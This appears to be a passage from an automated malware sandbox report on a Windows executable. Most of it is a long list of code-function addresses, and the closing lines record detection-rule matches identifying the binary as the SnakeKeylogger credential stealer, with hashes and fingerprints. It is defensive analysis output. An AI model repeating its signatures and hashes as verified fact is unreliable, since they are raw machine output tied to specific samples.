                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F6DA013_2_005F6DA0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006195D013_2_006195D0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006182B013_2_006182B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061376013_2_00613760
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00619F6013_2_00619F60
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061096013_2_00610960
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061776013_2_00617760
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061876713_2_00618767
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061206813_2_00612068
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061CA6813_2_0061CA68
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061606813_2_00616068
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061097013_2_00610970
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061777013_2_00617770
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061F57013_2_0061F570
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061497013_2_00614970
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061B27213_2_0061B272
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061607813_2_00616078
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061877813_2_00618778
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061DD7813_2_0061DD78
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061004013_2_00610040
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00616E4013_2_00616E40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00618C4013_2_00618C40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061404013_2_00614040
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061574813_2_00615748
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061B74813_2_0061B748
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00619F4F13_2_00619F4F
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061405013_2_00614050
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061E25013_2_0061E250
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061375213_2_00613752
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061CF2013_2_0061CF20
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061A42813_2_0061A428
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061FA2813_2_0061FA28
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00618C3113_2_00618C31
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00612E3013_2_00612E30
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061CF3013_2_0061CF30
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00616E3213_2_00616E32
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061B73713_2_0061B737
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061573913_2_00615739
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061173813_2_00611738
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061FA3813_2_0061FA38
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061E23F13_2_0061E23F
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061250013_2_00612500
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061650013_2_00616500
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00614E0913_2_00614E09
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00610E0813_2_00610E08
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00617C0813_2_00617C08
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061910813_2_00619108
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061E70E13_2_0061E70E
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061651013_2_00616510
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061BC1013_2_0061BC10
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00614E1813_2_00614E18
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061E71813_2_0061E718
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061A41813_2_0061A418
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00615BE013_2_00615BE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061EBE013_2_0061EBE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061A8E013_2_0061A8E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006144E813_2_006144E8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061D3E813_2_0061D3E8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061A8F013_2_0061A8F0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061D3F813_2_0061D3F8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00610DF813_2_00610DF8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00617BF813_2_00617BF8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006190FC13_2_006190FC
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061D8C013_2_0061D8C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006195C013_2_006195C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006172C913_2_006172C9
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006132C813_2_006132C8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061EBCF13_2_0061EBCF
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00611BD013_2_00611BD0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00615BD013_2_00615BD0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006104D813_2_006104D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006172D813_2_006172D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061C0D813_2_0061C0D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006144D813_2_006144D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006152A113_2_006152A1
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006112A013_2_006112A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061C5A013_2_0061C5A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006169A813_2_006169A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061F0A813_2_0061F0A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061ADA813_2_0061ADA8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00613BAA13_2_00613BAA
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061D8AF13_2_0061D8AF
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006152B013_2_006152B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00613BB813_2_00613BB8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061ADB813_2_0061ADB8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061498013_2_00614980
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061B28013_2_0061B280
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061DD8813_2_0061DD88
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00619A8C13_2_00619A8C
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061C59013_2_0061C590
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061299813_2_00612998
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00619A9813_2_00619A98
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061F09813_2_0061F098
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0061699A13_2_0061699A
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073A12013_2_0073A120
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073C06013_2_0073C060
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073F26013_2_0073F260
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073D64013_2_0073D640
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073A44013_2_0073A440
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073004013_2_00730040
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073BA2013_2_0073BA20
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073EC2013_2_0073EC20
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073182813_2_00731828
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073001213_2_00730012
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073301013_2_00733010
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073D00013_2_0073D000
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00731CF013_2_00731CF0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_007304F813_2_007304F8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073CCE013_2_0073CCE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073B6EF13_2_0073B6EF
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_007334D513_2_007334D5
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_007334D813_2_007334D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073E2C013_2_0073E2C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073B0C013_2_0073B0C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073C6A013_2_0073C6A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073F8A013_2_0073F8A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00730E9813_2_00730E98
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073AA8013_2_0073AA80
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073268013_2_00732680
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073DC8013_2_0073DC80
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00730E8713_2_00730E87
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073A76013_2_0073A760
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073136013_2_00731360
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073D96013_2_0073D960
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073135B13_2_0073135B
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073BD4013_2_0073BD40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073EF4013_2_0073EF40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00732B4813_2_00732B48
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073D32013_2_0073D320
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073B70013_2_0073B700
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073E90013_2_0073E900
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073050813_2_00730508
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073E5E013_2_0073E5E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073B3E013_2_0073B3E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_007309D013_2_007309D0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_007309C213_2_007309C2
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073C9C013_2_0073C9C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073FBC013_2_0073FBC0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_007321B813_2_007321B8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073ADA013_2_0073ADA0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_007339A013_2_007339A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073DFA013_2_0073DFA0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073C9AF13_2_0073C9AF
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073C38013_2_0073C380
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_0073F58013_2_0073F580
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B68E813_2_008B68E8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B004013_2_008B0040
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B578813_2_008B5788
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BDE8813_2_008BDE88
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B718813_2_008B7188
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B648213_2_008B6482
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BD18013_2_008BD180
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B4A8013_2_008B4A80
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B719813_2_008B7198
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B8B9813_2_008B8B98
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B7E9E13_2_008B7E9E
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B649013_2_008B6490
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BF2A813_2_008BF2A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B8BA813_2_008B8BA8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B98A213_2_008B98A2
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B7EA013_2_008B7EA0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B34B913_2_008B34B9
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BBBB813_2_008BBBB8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B98B013_2_008B98B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BAEB013_2_008BAEB0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B34C813_2_008B34C8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BBBC813_2_008BBBC8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B4ECE13_2_008B4ECE
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BC8C113_2_008BC8C1
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BAEC013_2_008BAEC0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B41C013_2_008B41C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B68DA13_2_008B68DA
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B4ED813_2_008B4ED8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BD5D813_2_008BD5D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BFBD813_2_008BFBD8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B5BD113_2_008B5BD1
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BC8D013_2_008BC8D0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B41D013_2_008B41D0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B5BE013_2_008B5BE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BE4E013_2_008BE4E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B82F813_2_008B82F8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B75F013_2_008B75F0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B8FF013_2_008B8FF0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B9D0813_2_008B9D08
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BB30813_2_008BB308
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B900013_2_008B9000
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B000613_2_008B0006
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B461A13_2_008B461A
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BB31813_2_008BB318
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BEE1013_2_008BEE10
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B391013_2_008B3910
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BC01013_2_008BC010
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BCD2813_2_008BCD28
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B462813_2_008B4628
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B602813_2_008B6028
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BC02013_2_008BC020
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B392013_2_008B3920
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B532613_2_008B5326
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B603813_2_008B6038
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B7A3E13_2_008B7A3E
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BF73113_2_008BF731
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B533013_2_008B5330
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BDA3013_2_008BDA30
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B6D3013_2_008B6D30
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B7A4813_2_008B7A48
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B944813_2_008B9448
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BF74013_2_008BF740
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B6D4013_2_008B6D40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B874013_2_008B8740
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BAA5913_2_008BAA59
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B945813_2_008B9458
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B305F13_2_008B305F
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B875013_2_008B8750
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BAA6813_2_008BAA68
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B3D6813_2_008B3D68
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BC46813_2_008BC468
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BB76013_2_008BB760
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B3D7813_2_008B3D78
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BC47813_2_008BC478
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BE97813_2_008BE978
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B577813_2_008B5778
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BDE7813_2_008BDE78
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008BB77013_2_008BB770
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B307013_2_008B3070
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_008B4A7013_2_008B4A70
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C550D813_2_00C550D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C549F813_2_00C549F8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C557B813_2_00C557B8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C5004013_2_00C50040
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C5355813_2_00C53558
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C52E7813_2_00C52E78
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C5431813_2_00C54318
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C53C3813_2_00C53C38
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C550C813_2_00C550C8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C50ED813_2_00C50ED8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C549E913_2_00C549E9
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C52AF913_2_00C52AF9
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C557A813_2_00C557A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C5354B13_2_00C5354B
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C52E6813_2_00C52E68
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C52B0013_2_00C52B00
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C5430813_2_00C54308
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C5212113_2_00C52121
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C53C2813_2_00C53C28
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_00C5213013_2_00C52130
                  Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
